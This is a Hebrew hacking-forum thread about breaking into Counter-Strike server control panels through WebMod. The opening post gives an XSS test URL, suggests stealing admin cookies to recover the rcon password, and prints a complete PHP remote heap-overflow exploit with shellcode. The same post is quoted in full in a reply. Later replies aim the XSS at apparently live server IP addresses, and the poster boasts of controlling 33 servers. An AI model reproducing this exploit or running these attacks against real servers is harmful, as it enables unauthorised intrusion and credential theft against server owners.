קהילות פורומים, הורדות, יעוץ ותמיכה


אשכולות דומים

  1. בונה שרתי קונטר!
    על ידי lior1230010 בפורום Counter Strike
    תגובות: 1
    הודעה אחרונה: 15-02-2010, 16:55
  2. מדריך| הפלת שרתי קונטר סטרייק
    על ידי dorrok בפורום האקינג ואבטחת מידע
    תגובות: 1
    הודעה אחרונה: 07-01-2010, 12:31
  3. [וידאו] מדריך + תוכנה להפיל שרתי קונטר ומייפל !
    על ידי Yoske בפורום האקינג ואבטחת מידע
    תגובות: 18
    הודעה אחרונה: 25-12-2009, 15:29
  4. [מוכר] תוכנה להפלת שרתי קונטר |300 נק'
    על ידי killeril בפורום מכירה
    תגובות: 1
    הודעה אחרונה: 12-05-2009, 18:39
  5. מכירת שרתי קונטר סטרייק בזול עם הרבה שחקנים ומודים .
    על ידי שגיב יחזקאל בפורום Counter Strike
    תגובות: 1
    הודעה אחרונה: 17-03-2009, 14:04
+ תגובה לנושא
עמוד 1 מתוך 2 12 אחרון >>
מציג תוצאות 1 עד 15 מתוך 22

חור פריצה שרתי קונטר WebMod

  1. #1
    משתמש מתחיל
    שם פרטי
    בוריס
    תאריך הצטרפות
    09/2010
    הודעות
    330
    לייקים
    23
    נקודות
    1
    משפט מחץ
    עזוב אותך חתימה... פה יותר טוב
    מין: זכר

    ברירת מחדל חור פריצה שרתי קונטר WebMod

    היה פעם ילד בשם מתן לוי שבנה אתר שבודקת את יעילות האבטחה של פאנלים של WebMod
    עם דוגמה היה לך פאנל של שרת קונטר היית שם אותו באתר ובודק את האבטחה וזה מביא לך את הסיסמה בלי להסתבך,
    מכיוון שהאתר ירד מהרשת עקב פגיעה בבעלי עסקים ישר הבנתי שיש חור פריצה בבפאנל WebMod המאפשר שליפת סיסמאות,

    אוקיי אז חיפשתי ומצאתי חור XSS ב- auth.w?redir שזה באג במערכת,
    יש אפשרות לראות קוקיז ועוגייה שמזהה את האדמין rconpass סיסמאת הרקון מוצפנת בתוך המילה c.rconpass.
    יש אפשרות לגנוב עוגיות ולפצח את ההצפנה ואז להתחבר למערכת

    אז קודם כל זה ה- XSS

    קוד PHP:
    http://ip:port/auth.w?redir="><script>alert(1337)</script> 
    ניתן לשלוף עוגיות טבלאות דרך התוכנה Havij וניתן לעשות XSS Scnner ולמצוא עוד מקומות פגיעים במערכת,

    והנה לכולם אקספלוייט שניתן להריץ ולקמפל בכל עת,

    קוד PHP:
    <?php
    ## HLDS WebMod 0.48  (rconpass) Remote Heap Overflow Exploit
    ## Tested on HLDS Launcher 4.1.1.1, WebMod 0.48, Windows XP SP2 Hebrew
    ## shir, skod.uk [at] gmail [dot] com
    ## 17/12/2007
     
    ## Registers (rconpass = "A"x16444):
    # EAX 67E04955 w_mm.67E04955
    # ECX 41414141
    # EDX 41414141
    # EBX 0000000A
    # ESP 08F650FC
    # EBP 08F726D4
    # ESI 08F72734
    # EDI 00000000
    # EIP 67E0498C w_mm.67E0498C
    #########
     
     
    error_reporting(7);
    ini_set("max_execution_time",0);
     
    if(
    $_SERVER['argv'][1] && $_SERVER['argv'][2]) {
        
    $host $_SERVER['argv'][1];
        
    $port $_SERVER['argv'][2];
    } else {
     
        echo (
    "\r\nHLDS WebMod 0.48 Remote Heap Overflow Exploit\r\n");
        echo (
    "Written by shir, skod.uk\x40gmail\x2Ecom\r\n");
        echo (
    "Usage: php {$_SERVER['argv'][0]} IP PORT\r\n");
        echo (
    "Example: php {$_SERVER['argv'][0]} 192.168.0.100 27015\r\n");
        exit();
    }
     
    echo 
    "[~] Packing...\r\n";
     
     
    $scode "\x66\x83\xC0\x04\xFF\xE0"/*ADD EAX, 4 => JMP EAX*/
     
    # win32_bind - Calc executer. Metasploit.com
    $shellcode =
    "\x33\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xf4".
    "\x47\xba\xa4\x83\xeb\xfc\xe2\xf4\x08\xaf\xfe\xa4\xf4\x47\x31\xe1".
    "\xc8\xcc\xc6\xa1\x8c\x46\x55\x2f\xbb\x5f\x31\xfb\xd4\x46\x51\xed".
    "\x7f\x73\x31\xa5\x1a\x76\x7a\x3d\x58\xc3\x7a\xd0\xf3\x86\x70\xa9".
    "\xf5\x85\x51\x50\xcf\x13\x9e\xa0\x81\xa2\x31\xfb\xd0\x46\x51\xc2".
    "\x7f\x4b\xf1\x2f\xab\x5b\xbb\x4f\x7f\x5b\x31\xa5\x1f\xce\xe6\x80".
    "\xf0\x84\x8b\x64\x90\xcc\xfa\x94\x71\x87\xc2\xa8\x7f\x07\xb6\x2f".
    "\x84\x5b\x17\x2f\x9c\x4f\x51\xad\x7f\xc7\x0a\xa4\xf4\x47\x31\xcc".
    "\xc8\x18\x8b\x52\x94\x11\x33\x5c\x77\x87\xc1\xf4\x9c\xb7\x30\xa0".
    "\xab\x2f\x22\x5a\x7e\x49\xed\x5b\x13\x24\xdb\xc8\x97\x47\xba\xa4";
     
    $evilcode str_repeat("\x90"100);
    $evilcode.= $shellcode;
    $evilcode.= str_repeat("\x90"16156-(strlen($shellcode)));
     
    $evilcode.= "\xFD\xAF\x6A\x07"#076AAFFD   FFE4 => JMP ESP (cstrike\dlls\mp.dll)
     
     
    $evilcode.= str_repeat("\x90"60-(strlen($scode)));
    $evilcode.= $scode;
    $evilcode.= str_repeat("\x90"8);
    $evilcode.= str_repeat("0"72);
    $evilcode.= str_repeat("%00"4);
    $evilcode.= str_repeat("0"4);
    $evilcode.= "\x20\xF0\xFD\x7F"#Windows PEB Lock Pointer
    $evilcode.= str_repeat("%00"8);
     
    $post "rconpass=" $evilcode "&setcookiesNULL=rconpass";
     
    $pack "POST /auth.w?redir= HTTP/1.1\r\n";
    $pack.= "Host: {$host}:{$port}\r\n";
    $pack.= "User-Agent: Mozilla/5.0\r\n";
    $pack.= "Accept: */*\r\n";
    $pack.= "Accept-Language: en-us,en;q=0.5\r\n";
    $pack.= "Accept-Encoding: gzip,deflate\r\n";
    $pack.= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";
    $pack.= "Keep-Alive: 300\r\n";
    $pack.= "Connection: keep-alive\r\n";
    $pack.= "Content-Type: application/x-www-form-urlencoded\r\n";
    $pack.= "Content-Length: "strlen($post) ."\r\n\r\n" $post;
     
    echo 
    "[~] Sending...\r\n";
     
    $sock = @fsockopen($host$port$errno$errstr10);
        if (
    $errstr)
            echo(
    "[-] Can't connect {$host}:{$port}\r\n");
        else {
                
    fputs($sock$pack);
                
    $tmp fgets($sock,1024);
                    if(
    strstr($tmp'<'))
                        echo 
    "[-] Failed, you better try again.\r\n";
                    else
                        echo 
    "[+] Shellcode should be executed.\r\n";
                
    fclose($sock);
            }
    ?>
     
    # milw0rm.com [2008-05-03]
    נבדק ועובד 100% תהנו ממני אליכם Mr_Boris, מה קורה סניר
    נערך לאחרונה על ידי mr_boris; 28-05-2011 בשעה 21:09.

  2. קישורים ממומנים

  3. #2
    משתמש ותיק האוואטר של -Random-
    תאריך הצטרפות
    11/2010
    הודעות
    5,279
    לייקים
    353
    נקודות
    877
    פוסטים בבלוג
    2
    מין: זכר

    ברירת מחדל

    ציטוט נכתב במקור על ידי mr_boris צפיה בהודעה
    היה פעם ילד בשם מתן לוי שבנה אתר שבודקת את יעילות האבטחה של פאנלים של WebMod
    עם דוגמה היה לך פאנל של שרת קונטר היית שם אותו באתר ובודק את האבטחה וזה מביא לך את הסיסמה בלי להסתבך,
    מכיוון שהאתר ירד מהרשת עקב פגיעה בבעלי עסקים ישר הבנתי שיש חור פריצה בבפאנל WebMod המאפשר שליפת סיסמאות,

    אוקיי אז חיפשתי ומצאתי חור XSS ב- auth.w?redir שזה באג במערכת,
    יש אפשרות לראות קוקיז ועוגייה שמזהה את האדמין rconpass סיסמאת הרקון מוצפנת בתוך המילה c.rconpass.
    יש אפשרות לגנוב עוגיות ולפצח את ההצפנה ואז להתחבר למערכת

    אז קודם כל זה ה- XSS

    קוד PHP:
    http://ip:port/auth.w?redir="><script>alert(1337)</script> 
    ניתן לשלוף עוגיות טבלאות דרך התוכנה Havij וניתן לעשות XSS Scnner ולמצוא עוד מקומות פגיעים במערכת,

    והנה לכולם אקספלוייט שניתן להריץ ולקמפל בכל עת,

    קוד PHP:
    <?php
    ## HLDS WebMod 0.48  (rconpass) Remote Heap Overflow Exploit
    ## Tested on HLDS Launcher 4.1.1.1, WebMod 0.48, Windows XP SP2 Hebrew
    ## shir, skod.uk [at] gmail [dot] com
    ## 17/12/2007
     
    ## Registers (rconpass = "A"x16444):
    # EAX 67E04955 w_mm.67E04955
    # ECX 41414141
    # EDX 41414141
    # EBX 0000000A
    # ESP 08F650FC
    # EBP 08F726D4
    # ESI 08F72734
    # EDI 00000000
    # EIP 67E0498C w_mm.67E0498C
    #########
     
     
    error_reporting(7);
    ini_set("max_execution_time",0);
     
    if(
    $_SERVER['argv'][1] && $_SERVER['argv'][2]) {
        
    $host $_SERVER['argv'][1];
        
    $port $_SERVER['argv'][2];
    } else {
     
        echo (
    "\r\nHLDS WebMod 0.48 Remote Heap Overflow Exploit\r\n");
        echo (
    "Written by shir, skod.uk\x40gmail\x2Ecom\r\n");
        echo (
    "Usage: php {$_SERVER['argv'][0]} IP PORT\r\n");
        echo (
    "Example: php {$_SERVER['argv'][0]} 192.168.0.100 27015\r\n");
        exit();
    }
     
    echo 
    "[~] Packing...\r\n";
     
     
    $scode "\x66\x83\xC0\x04\xFF\xE0"/*ADD EAX, 4 => JMP EAX*/
     
    # win32_bind - Calc executer. Metasploit.com
    $shellcode =
    "\x33\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xf4".
    "\x47\xba\xa4\x83\xeb\xfc\xe2\xf4\x08\xaf\xfe\xa4\xf4\x47\x31\xe1".
    "\xc8\xcc\xc6\xa1\x8c\x46\x55\x2f\xbb\x5f\x31\xfb\xd4\x46\x51\xed".
    "\x7f\x73\x31\xa5\x1a\x76\x7a\x3d\x58\xc3\x7a\xd0\xf3\x86\x70\xa9".
    "\xf5\x85\x51\x50\xcf\x13\x9e\xa0\x81\xa2\x31\xfb\xd0\x46\x51\xc2".
    "\x7f\x4b\xf1\x2f\xab\x5b\xbb\x4f\x7f\x5b\x31\xa5\x1f\xce\xe6\x80".
    "\xf0\x84\x8b\x64\x90\xcc\xfa\x94\x71\x87\xc2\xa8\x7f\x07\xb6\x2f".
    "\x84\x5b\x17\x2f\x9c\x4f\x51\xad\x7f\xc7\x0a\xa4\xf4\x47\x31\xcc".
    "\xc8\x18\x8b\x52\x94\x11\x33\x5c\x77\x87\xc1\xf4\x9c\xb7\x30\xa0".
    "\xab\x2f\x22\x5a\x7e\x49\xed\x5b\x13\x24\xdb\xc8\x97\x47\xba\xa4";
     
    $evilcode str_repeat("\x90"100);
    $evilcode.= $shellcode;
    $evilcode.= str_repeat("\x90"16156-(strlen($shellcode)));
     
    $evilcode.= "\xFD\xAF\x6A\x07"#076AAFFD   FFE4 => JMP ESP (cstrike\dlls\mp.dll)
     
     
    $evilcode.= str_repeat("\x90"60-(strlen($scode)));
    $evilcode.= $scode;
    $evilcode.= str_repeat("\x90"8);
    $evilcode.= str_repeat("0"72);
    $evilcode.= str_repeat("%00"4);
    $evilcode.= str_repeat("0"4);
    $evilcode.= "\x20\xF0\xFD\x7F"#Windows PEB Lock Pointer
    $evilcode.= str_repeat("%00"8);
     
    $post "rconpass=" $evilcode "&setcookiesNULL=rconpass";
     
    $pack "POST /auth.w?redir= HTTP/1.1\r\n";
    $pack.= "Host: {$host}:{$port}\r\n";
    $pack.= "User-Agent: Mozilla/5.0\r\n";
    $pack.= "Accept: */*\r\n";
    $pack.= "Accept-Language: en-us,en;q=0.5\r\n";
    $pack.= "Accept-Encoding: gzip,deflate\r\n";
    $pack.= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";
    $pack.= "Keep-Alive: 300\r\n";
    $pack.= "Connection: keep-alive\r\n";
    $pack.= "Content-Type: application/x-www-form-urlencoded\r\n";
    $pack.= "Content-Length: "strlen($post) ."\r\n\r\n" $post;
     
    echo 
    "[~] Sending...\r\n";
     
    $sock = @fsockopen($host$port$errno$errstr10);
        if (
    $errstr)
            echo(
    "[-] Can't connect {$host}:{$port}\r\n");
        else {
                
    fputs($sock$pack);
                
    $tmp fgets($sock,1024);
                    if(
    strstr($tmp'<'))
                        echo 
    "[-] Failed, you better try again.\r\n";
                    else
                        echo 
    "[+] Shellcode should be executed.\r\n";
                
    fclose($sock);
            }
    ?>
     
    # milw0rm.com [2008-05-03]

    נבדק ועובד 100% תהנו ממני אליכם Mr_Boris,
    אחי יש מצב אתה מלמד אותי איך להשתמש בזה?

  4. #3
    משתמש משקיע האוואטר של OverPowered
    שם פרטי
    ניק
    תאריך הצטרפות
    04/2010
    הודעות
    4,248
    לייקים
    691
    נקודות
    6
    משפט מחץ
    You know what your problem is... I'm too good looking
    מין: זכר

    ברירת מחדל

    הXSS לא מגיב והאקפלויט לא תקף כבר , לפחות אצלי הוא לא עובד.
    לקחתי שרת רנדומלי מהגוגל



  5. #4
    משתמש מתקדם האוואטר של Zer0Day
    תאריך הצטרפות
    01/2011
    גיל
    36
    הודעות
    827
    לייקים
    6
    נקודות
    98
    מין: זכר

    ברירת מחדל

    קוד:
    # milw0rm.com [2008-05-03]
    LOL?
    תודה על השיתוף .



  6. #5
    משתמש מתקדם
    שם פרטי
    חסוי
    תאריך הצטרפות
    10/2010
    הודעות
    885
    לייקים
    22
    נקודות
    -59
    משפט מחץ
    ):
    מין: זכר

    ברירת מחדל

    זה לא EXPOLIT זה SHELLCODE.

    מנהל אבטחת מידע לשעבר.

  7. #6
    משתמש מתחיל
    שם פרטי
    בוריס
    תאריך הצטרפות
    09/2010
    הודעות
    330
    לייקים
    23
    נקודות
    1
    משפט מחץ
    עזוב אותך חתימה... פה יותר טוב
    מין: זכר

    ברירת מחדל

    ציטוט נכתב במקור על ידי OverPowered צפיה בהודעה
    הXSS לא מגיב והאקפלויט לא תקף כבר , לפחות אצלי הוא לא עובד.
    לקחתי שרת רנדומלי מהגוגל
    לא יודע למה אצלי פועל מצויין ויש לי כבר 33 שרתים

    http://213.8.192.246:36000/auth.w?re...)%3C/script%3E

    ואכן מגיב

    http://213.8.192.246:36000/
    נערך לאחרונה על ידי mr_boris; 26-05-2011 בשעה 21:23.

  8. #7
    משתמש מתקדם האוואטר של Zer0Day
    תאריך הצטרפות
    01/2011
    גיל
    36
    הודעות
    827
    לייקים
    6
    נקודות
    98
    מין: זכר

    ברירת מחדל

    ציטוט נכתב במקור על ידי mr_boris צפיה בהודעה
    לא יודע למה אצלי פועל מצויין ויש לי כבר 33 שרתים

    http://213.8.192.246:36000/auth.w?re...)%3C/script%3E

    ואכן מגיב

    http://213.8.192.246:36000/
    213.8.155.55:10005/auth.w?redir="><script>alert(1337)</script>
    לקחתי סתם שרת מCS-SERVESR
    זה כנראה תלוי בחברה, ואם הוא משתמש בWebmod או לא .



  9. #8
    משתמש מתחיל
    שם פרטי
    בוריס
    תאריך הצטרפות
    09/2010
    הודעות
    330
    לייקים
    23
    נקודות
    1
    משפט מחץ
    עזוב אותך חתימה... פה יותר טוב
    מין: זכר

    ברירת מחדל

    ציטוט נכתב במקור על ידי Zer0Day צפיה בהודעה
    213.8.155.55:10005/auth.w?redir="><script>alert(1337)</script>
    לקחתי סתם שרת מCS-SERVESR
    זה כנראה תלוי בחברה, ואם הוא משתמש בWebmod או לא .
    יש חברות ש רתים שמשנים את הפורט של הפאנל כדי שלא יפרצו......

  10. #9
    משתמש משקיע האוואטר של OverPowered
    שם פרטי
    ניק
    תאריך הצטרפות
    04/2010
    הודעות
    4,248
    לייקים
    691
    נקודות
    6
    משפט מחץ
    You know what your problem is... I'm too good looking
    מין: זכר

    ברירת מחדל

    ציטוט נכתב במקור על ידי mr_boris צפיה בהודעה
    לא יודע למה אצלי פועל מצויין ויש לי כבר 33 שרתים

    http://213.8.192.246:36000/auth.w?re...)%3C/script%3E

    ואכן מגיב

    http://213.8.192.246:36000/
    ומה בדיוק עושים לאחר שנכנסים ורואים שיש פרצת XSS?
    איפה רואים את הסיסמאת רקון או את סיסמת האדמין לאתר בדיוק?

    הסקריפט מאוד מסובך ולא פועל.



  11. #10
    משתמש מכור
    שם פרטי
    דולב
    תאריך הצטרפות
    08/2010
    הודעות
    1,009
    לייקים
    0
    נקודות
    24
    משפט מחץ
    רק מי שלוקח סיכון והולך רחוק, מגלה עד כמה רחוק הוא יכול להגיע.
    מין: זכר

    ברירת מחדל

    לא רק שהוא גם לא פועל זה גם מועתק


    כל מי שמעוניין שחיים ( Jaguar ) יחזור למנהל ראשי שיעתיק את זה לחתימה שלו !

  12. #11
    משתמש מתקדם האוואטר של - Gal.D -
    שם פרטי
    גל
    תאריך הצטרפות
    10/2008
    הודעות
    606
    לייקים
    5
    נקודות
    1,730
    משפט מחץ
    הפועל אותך אמשיך רק לאהוב ומי שלא קופץ צהוב!
    מין: זכר

    ברירת מחדל

    לא פועל...

  13. #12
    משתמש מתקדם האוואטר של Zer0Day
    תאריך הצטרפות
    01/2011
    גיל
    36
    הודעות
    827
    לייקים
    6
    נקודות
    98
    מין: זכר

    ברירת מחדל

    ציטוט נכתב במקור על ידי - Gal.D - צפיה בהודעה
    לא פועל...
    עובד, פשוט בשרת של הקורבן לא מופעל Webmod .



  14. #13
    משתמש מתקדם האוואטר של - Gal.D -
    שם פרטי
    גל
    תאריך הצטרפות
    10/2008
    הודעות
    606
    לייקים
    5
    נקודות
    1,730
    משפט מחץ
    הפועל אותך אמשיך רק לאהוב ומי שלא קופץ צהוב!
    מין: זכר

    ברירת מחדל

    מישהו מוכן לעזור לי במסן ? בבקשה !

  15. #14
    משתמש מכור
    שם פרטי
    דולב
    תאריך הצטרפות
    08/2010
    הודעות
    1,009
    לייקים
    0
    נקודות
    24
    משפט מחץ
    רק מי שלוקח סיכון והולך רחוק, מגלה עד כמה רחוק הוא יכול להגיע.
    מין: זכר

    ברירת מחדל

    ציטוט נכתב במקור על ידי Zer0Day צפיה בהודעה
    עובד, פשוט בשרת של הקורבן לא מופעל Webmod .
    זה מועתק אתה אמור לנעול תנושא


    כל מי שמעוניין שחיים ( Jaguar ) יחזור למנהל ראשי שיעתיק את זה לחתימה שלו !

  16. #15
    משתמש מתקדם האוואטר של Zer0Day
    תאריך הצטרפות
    01/2011
    גיל
    36
    הודעות
    827
    לייקים
    6
    נקודות
    98
    מין: זכר

    ברירת מחדל

    ציטוט נכתב במקור על ידי dolevzZz צפיה בהודעה
    זה מועתק אתה אמור לנעול תנושא
    רק שהשאללקוד מועתק, וד.א אין חוק שאומר שאם משתמש מעתיק תוכן מאתר מסוים אז אני חייב לנעול לו את האשכול .



+ תגובה לנושא
עמוד 1 מתוך 2 12 אחרון >>


הרשאות פרסום

  • אין באפשרותך לפרסם נושאים חדשים
  • אין באפשרותך לפרסם תגובות
  • אין באפשרותך לצרף קבצים
  • אין באפשרותך לערוך את הודעותיך


כל הזמנים הם לפי GMT +3. השעה כרגע היא 11:25.
מופעל על ידי vBulletin™ © גרסה 4.1, 2011 vBulletin Solutions, Inc. כל הזכויות שמורות.
פעילות הגולשים
אומנות וגרפיקה
מוזיקה
ספורט
סדרות טלוויזיה
סרטים וקולנוע
קנייה ומכירה
רשתות חברתיות
הבורר 3
פורומי פנאי ובידור
סרטים
סדרות
משחקים
דיבורים
אקטואליה
בעלי חיים
בדיחות והומור
משחקי ספורט
הבורר
מחשבים וטכנולוגיה
תמיכה טכנית
חומרה ומודינג
תוכנות להורדה
סלולארי וגאדג'טים
רקעים למחשב
ציוד הקפי למחשב
אבטחת מידע
תכנות ובניית אתרים
כסף ברשת
אייפון
בריאות ואורח חיים
כושר ופיתוח גוף
דיאטה
צבא וגיוס
יעוץ מיני
מה שבלב
אומנות הפיתוי
יהדות
מיסטיקה ורוחניות
אתאיזם ודתות

נושאים: 2,500,191 | הודעות: 8,200,784 | משתמשים: 315,603 | המשתמש החדש ביותר: upizijoj | עיצוב גרפי: סטודיו עודד בביוף | קידוד: rellect